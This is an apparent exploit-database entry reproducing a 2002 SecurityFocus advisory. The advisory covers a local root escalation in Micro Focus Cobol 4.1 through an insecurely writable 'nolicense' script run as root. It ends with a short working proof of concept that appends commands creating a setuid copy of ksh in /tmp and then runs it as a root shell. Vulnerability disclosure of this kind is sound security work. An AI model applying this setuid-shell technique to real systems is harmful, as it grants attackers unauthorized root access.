Micro Focus Cobol Apptrack Privilege Escalation Vulnerability

vendor:

Cobol

by:

SecurityFocus

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Cobol

Affected Version From: 4.1

Affected Version To: 4.1

Patch Exists: NO

Related CWE: N/A

CPE: a:micro_focus:cobol

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix

2002

Micro Focus Cobol Apptrack Privilege Escalation Vulnerability

If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions. As a result, attackers may be able to execute arbitrary commands as root if the script is modified.

Mitigation:

Ensure that the 'Apptrack' feature is disabled and that the 'nolicense' script is not installed with insecure file permissions.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2359/info

Micro Focus Cobol is a development suite for unix platforms offered by Merant. It is typically licensed on a per-user basis.

If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions.

As a result, attackers may be able to execute arbitrary commands as root if the script is modified.

This is known to affect version 4.1. Though unverified, previous versions of Micro Focus Cobol may also be vulnerable. 

$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D

[wait until the application server licenses are used up]

$ /tmp/ksh
#